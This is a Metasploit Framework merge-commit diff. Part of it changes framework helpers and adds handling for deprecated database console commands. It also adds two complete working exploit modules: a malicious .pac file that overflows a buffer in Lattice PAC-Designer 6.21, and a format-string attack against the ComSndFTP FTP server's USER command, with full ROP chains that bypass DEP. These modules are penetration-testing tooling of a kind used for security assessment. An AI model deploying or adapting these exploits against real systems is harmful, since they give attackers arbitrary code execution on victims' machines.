Merge branch 'master' into feature/vuln-info
commit
8177783681
|
@ -40,11 +40,12 @@ module Auxiliary
|
|||
# Whether or not the exploit should be run in the context of a background
|
||||
# job.
|
||||
#
|
||||
def self.run_simple(omod, opts = {})
|
||||
def self.run_simple(omod, opts = {}, &block)
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
mod = omod.replicant
|
||||
Msf::Simple::Framework.simplify_module( mod, false )
|
||||
yield(mod) if block_given?
|
||||
|
||||
# Import options from the OptionStr or Option hash.
|
||||
mod._import_extra_options(opts)
|
||||
|
@ -80,6 +81,7 @@ module Auxiliary
|
|||
self.job_run_proc(ctx)
|
||||
self.job_cleanup_proc(ctx)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -54,14 +54,14 @@ module Exploit
|
|||
# Whether or not the exploit should be run in the context of a background
|
||||
# job.
|
||||
#
|
||||
def self.exploit_simple(oexploit, opts)
|
||||
def self.exploit_simple(oexploit, opts, &block)
|
||||
# Trap and print errors here (makes them UI-independent)
|
||||
begin
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
exploit = oexploit.replicant
|
||||
Msf::Simple::Framework.simplify_module( exploit, false )
|
||||
|
||||
yield(exploit) if block_given?
|
||||
|
||||
# Import options from the OptionStr or Option hash.
|
||||
exploit._import_extra_options(opts)
|
||||
|
|
|
@ -40,11 +40,12 @@ module Payload
|
|||
# NoKeyError => No valid encoder key could be found
|
||||
# ArgumentParseError => Options were supplied improperly
|
||||
#
|
||||
def self.generate_simple(payload, opts)
|
||||
def self.generate_simple(payload, opts, &block)
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
payload = payload.replicant
|
||||
Msf::Simple::Framework.simplify_module(payload)
|
||||
yield(payload) if block_given?
|
||||
|
||||
# Import any options we may need
|
||||
payload._import_extra_options(opts)
|
||||
|
|
|
@ -36,11 +36,12 @@ module Post
|
|||
# Whether or not the module should be run in the context of a background
|
||||
# job.
|
||||
#
|
||||
def self.run_simple(omod, opts = {})
|
||||
def self.run_simple(omod, opts = {}, &block)
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
mod = omod.replicant
|
||||
Msf::Simple::Framework.simplify_module( mod, false )
|
||||
yield(mod) if block_given?
|
||||
|
||||
# Import options from the OptionStr or Option hash.
|
||||
mod._import_extra_options(opts)
|
||||
|
|
|
@ -52,6 +52,17 @@ class Db
|
|||
base.merge(more)
|
||||
end
|
||||
|
||||
def deprecated_commands
|
||||
[
|
||||
"db_autopwn",
|
||||
"db_driver",
|
||||
"db_hosts",
|
||||
"db_notes",
|
||||
"db_services",
|
||||
"db_vulns",
|
||||
]
|
||||
end
|
||||
|
||||
#
|
||||
# Returns true if the db is connected, prints an error and returns
|
||||
# false if not.
|
||||
|
@ -1073,15 +1084,44 @@ class Db
|
|||
}
|
||||
end
|
||||
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_hosts_help; deprecated_help(:hosts); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_notes_help; deprecated_help(:notes); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_vulns_help; deprecated_help(:vulns); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_services_help; deprecated_help(:services); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_autopwn_help; deprecated_help; end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_driver_help; deprecated_help; end
|
||||
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_hosts(*args); deprecated_cmd(:hosts, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_notes(*args); deprecated_cmd(:notes, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_vulns(*args); deprecated_cmd(:vulns, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_services(*args); deprecated_cmd(:services, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_autopwn(*args); deprecated_cmd; end
|
||||
|
||||
# :category: Deprecated Commands
|
||||
#
|
||||
# Determine if an IP address is inside a given range
|
||||
# This one deserves a little more explanation than standard deprecation
|
||||
# warning, so give the user a better understanding of what's going on.
|
||||
#
|
||||
def range_include?(ranges, addr)
|
||||
ranges.each do |range|
|
||||
return true if range.include? addr
|
||||
end
|
||||
false
|
||||
def cmd_db_driver(*args)
|
||||
deprecated_cmd
|
||||
print_line
|
||||
print_line "Because Metasploit no longer supports databases other than the default"
|
||||
print_line "PostgreSQL, there is no longer a need to set the driver. Thus db_driver"
|
||||
print_line "is not useful and its functionality has been removed. Usually Metasploit"
|
||||
print_line "will already have connected to the database; check db_status to see."
|
||||
print_line
|
||||
cmd_db_status
|
||||
end
|
||||
|
||||
def cmd_db_import_tabs(str, words)
|
||||
|
|
|
@ -35,11 +35,23 @@ module DispatcherShell
|
|||
#
|
||||
# Returns nil for an empty set of commands.
|
||||
#
|
||||
# This method should be overridden
|
||||
# This method should be overridden to return a Hash with command
|
||||
# names for keys and brief help text for values.
|
||||
#
|
||||
def commands
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an empty set of commands.
|
||||
#
|
||||
# This method should be overridden if the dispatcher has commands that
|
||||
# should be treated as deprecated. Deprecated commands will not show up in
|
||||
# help and will not tab-complete, but will still be callable.
|
||||
#
|
||||
def deprecated_commands
|
||||
[]
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.print_error
|
||||
#
|
||||
|
@ -75,6 +87,33 @@ module DispatcherShell
|
|||
shell.print(msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Print a warning that the called command is deprecated and optionally
|
||||
# forward to the replacement +method+ (useful for when commands are
|
||||
# renamed).
|
||||
#
|
||||
def deprecated_cmd(method=nil, *args)
|
||||
cmd = caller[0].match(/`cmd_(.*)'/)[1]
|
||||
print_error "The #{cmd} command is DEPRECATED"
|
||||
if cmd == "db_autopwn"
|
||||
print_error "See http://r-7.co/xY65Zr instead"
|
||||
elsif method and self.respond_to?("cmd_#{method}")
|
||||
print_error "Use #{method} instead"
|
||||
self.send("cmd_#{method}", *args)
|
||||
end
|
||||
end
|
||||
|
||||
def deprecated_help(method=nil)
|
||||
cmd = caller[0].match(/`cmd_(.*)_help'/)[1]
|
||||
print_error "The #{cmd} command is DEPRECATED"
|
||||
if cmd == "db_autopwn"
|
||||
print_error "See http://r-7.co/xY65Zr instead"
|
||||
elsif method and self.respond_to?("cmd_#{method}_help")
|
||||
print_error "Use 'help #{method}' instead"
|
||||
self.send("cmd_#{method}_help")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.update_prompt
|
||||
#
|
||||
|
@ -337,7 +376,7 @@ module DispatcherShell
|
|||
next if not dispatcher.respond_to?('commands')
|
||||
|
||||
begin
|
||||
if (dispatcher.commands.has_key?(method))
|
||||
if (dispatcher.commands.has_key?(method) or dispatcher.deprecated_commands.include?(method))
|
||||
self.on_command_proc.call(line.strip) if self.on_command_proc
|
||||
run_command(dispatcher, method, arguments)
|
||||
found = true
|
||||
|
|
|
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::WmapModule
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
|
|
|
@ -0,0 +1,109 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
|
||||
6.21. As a .pac file, when supplying a long string of data to the 'value' field
|
||||
under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
|
||||
on the stack, which results in arbitrary code execution under the context of the
|
||||
user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', #Discovery
|
||||
'juan vazquez', #Metasploit
|
||||
'sinn3r' #Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2012-2915'],
|
||||
['OSVDB', '82001'],
|
||||
['EDB', '19006'],
|
||||
['BID', '53566'],
|
||||
['URL', 'http://secunia.com/advisories/48741']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x3c\x3e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => "seh"
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'PAC-Designer 6.21 on Windows XP SP3',
|
||||
{
|
||||
# P/P/R in PACD621.exe
|
||||
# ASLR: False, Rebase: False, SafeSEH: False, OS: False
|
||||
'Ret' => 0x00805020
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 16 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# The payload is placed in the <title> field
|
||||
p = payload.encoded
|
||||
|
||||
# The trigger is placed in the <value> field, which will jmp to our
|
||||
# payload in the <title> field.
|
||||
buf = "\x5f" #POP EDI
|
||||
buf << "\x5f" #POP EDI
|
||||
buf << "\x5c" #POP ESP
|
||||
buf << "\x61"*6 #POPAD x 6
|
||||
buf << "\x51" #PUSH ECX
|
||||
buf << "\xc3" #RET
|
||||
buf << rand_text_alpha(96-buf.length, payload_badchars)
|
||||
buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}" #Jmp back to the beginning of the buffer
|
||||
buf << [target.ret].pack('V')[0,3] # Partial overwrite
|
||||
|
||||
xml = %Q|<?xml version="1.0"?>
|
||||
<PacDesignData>
|
||||
<DocFmtVersion>1</DocFmtVersion>
|
||||
<DeviceType>ispPAC-CLK5410D</DeviceType>
|
||||
<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
|
||||
<SummaryInformation>
|
||||
<Title>#{p}</Title>
|
||||
<Author>#{Rex::Text.rand_text_alpha(6)}</Author>
|
||||
</SummaryInformation>
|
||||
|
||||
<SymbolicSchematicData>
|
||||
<Symbol>
|
||||
<SymKey>153</SymKey>
|
||||
<NameText>Profile 0 Ref Frequency</NameText>
|
||||
<Value>#{buf}</Value>
|
||||
</Symbol>
|
||||
</SymbolicSchematicData>
|
||||
</PacDesignData>|
|
||||
|
||||
file_create(xml)
|
||||
end
|
||||
end
|
||||
|
|
@ -0,0 +1,202 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ComSndFTP v1.3.7 Beta USER Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
|
||||
crafted format string specifier as a username. The crafted username is sent to to the server to
|
||||
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
|
||||
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
|
||||
The SEH exit function is preferred so that the administrators are not left with an unhandled
|
||||
exception message. When using the meterpreter payload, the process will never die, allowing
|
||||
for continuous exploitation.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
|
||||
'rick2600 <rick2600[at]corelan.be>', # msf module (target XP)
|
||||
'mr_me <mr_me[at]@corelan.be>', # msf module (target 23k)
|
||||
'corelanc0d3r <peter.ve[at]corelan.be>' # msf module
|
||||
],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
# When a DoS is NOT a DoS
|
||||
[ 'EDB', '19024']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh'
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'StackAdjustment' => -3500,
|
||||
'DisableNops' => 'True'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows XP SP3 - English',
|
||||
{
|
||||
'Functionpointer' => 0x71AC4050, # winsock pointer
|
||||
'Functionaddress' => 0x71AB2636, # the repair address
|
||||
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
|
||||
'Pad' => 568
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows Server 2003 - English',
|
||||
{
|
||||
'Functionpointer' => 0x71C14044, # winsock pointer
|
||||
'Functionaddress' => 0x71C02661, # the repair address
|
||||
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
|
||||
'Pad' => 568
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'Jun 08 2012'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(21),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
banner = sock.get(-1,3)
|
||||
validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
|
||||
validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
|
||||
validate << "\xf1\xc6\xf7\x21\x0d\x0a"
|
||||
disconnect
|
||||
|
||||
if (banner == validate)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
return rand_text_alpha(n).unpack("V").first
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
rop = ''
|
||||
if target.name =~ /Server 2003/
|
||||
# C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
|
||||
rop = [
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0x77ba1114, # <- *&VirtualProtect()
|
||||
0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
|
||||
junk,
|
||||
0x77bb0c86, # xchg eax,esi ; retn
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0xFFFFFBFF, # dwSize
|
||||
0x77BAD64D, # neg eax ; pop ebp ; retn
|
||||
junk,
|
||||
0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
|
||||
0x77bbfc02, # pop ecx ; retn
|
||||
0x77bef001, # ptr that is w+
|
||||
0x77bd8c04, # pop edi ; retn
|
||||
0x77bd8c05, # retn
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0xFFFFFFC0, # flNewProtect
|
||||
0x77BAD64D, # neg eax ; pop ebp ; retn
|
||||
0x77be2265, # ptr to 'push esp ; ret'
|
||||
0x77BB8285, # xchg eax,edx ; retn
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0x90909090, # nops
|
||||
0x77be6591, # pushad ; add al,0ef ; retn
|
||||
].pack("V*")
|
||||
|
||||
elsif target.name =~ /XP SP3/
|
||||
# C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
|
||||
rop = [
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0x77C11120, # <- *&VirtualProtect()
|
||||
0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
|
||||
junk,
|
||||
0x77C21891, # pop esi ; retn
|
||||
0x77C5D010, # ptr that is w+
|
||||
0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0xFFFFFBFF, # dwSize
|
||||
0x77C1BE18, # neg eax ; pop ebp ; retn
|
||||
junk,
|
||||
0x77C2362C, # pop ebx ; retn
|
||||
0x77C5D010, # ptr that is w+
|
||||
0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
|
||||
0x77C1F519, # pop ecx ; retn
|
||||
0x77C5D010, # ptr that is w+
|
||||
0x77C23B47, # pop edi ; retn
|
||||
0x77C23B48, # retn
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0xFFFFFFC0, # flNewProtect
|
||||
0x77C1BE18, # neg eax ; pop ebp ; retn
|
||||
0x77C35459, # ptr to 'push esp ; ret'
|
||||
0x77C58FBC, # xchg eax,edx ; retn
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0x90909090, # nops
|
||||
0x77C567F0, # pushad ; add al,0ef ; retn
|
||||
].pack("V*")
|
||||
end
|
||||
|
||||
stage1 = %Q{
|
||||
mov eax, #{target['Functionpointer']}
|
||||
mov ecx, #{target['Functionaddress']}
|
||||
mov [eax], ecx
|
||||
}
|
||||
|
||||
offset_wp = rand_text_alphanumeric(1)
|
||||
pivot = target['Pivot']
|
||||
offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length
|
||||
|
||||
attackstring = rand_text_alphanumeric(7)
|
||||
attackstring << [target['Functionpointer']].pack('V')
|
||||
attackstring << "%#{pivot}x" # special pointer to our pivot
|
||||
attackstring << "%p" * 208 + "#{offset_wp }%n" # format specifiers to read and write the function pointer
|
||||
attackstring << rand_text_alphanumeric(target['Pad'])
|
||||
attackstring << rop
|
||||
attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
|
||||
attackstring << payload.encoded
|
||||
attackstring << rand_text_alphanumeric(2000 - offset)
|
||||
attackstring << "\r\n"
|
||||
|
||||
sploit = "USER #{attackstring}\r\n"
|
||||
|
||||
print_status("Triggering overflow...")
|
||||
connect
|
||||
sock.get_once(1024)
|
||||
sock.put(sploit)
|
||||
select(nil, nil, nil, 2)
|
||||
handler
|
||||
disconnect
|
||||
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue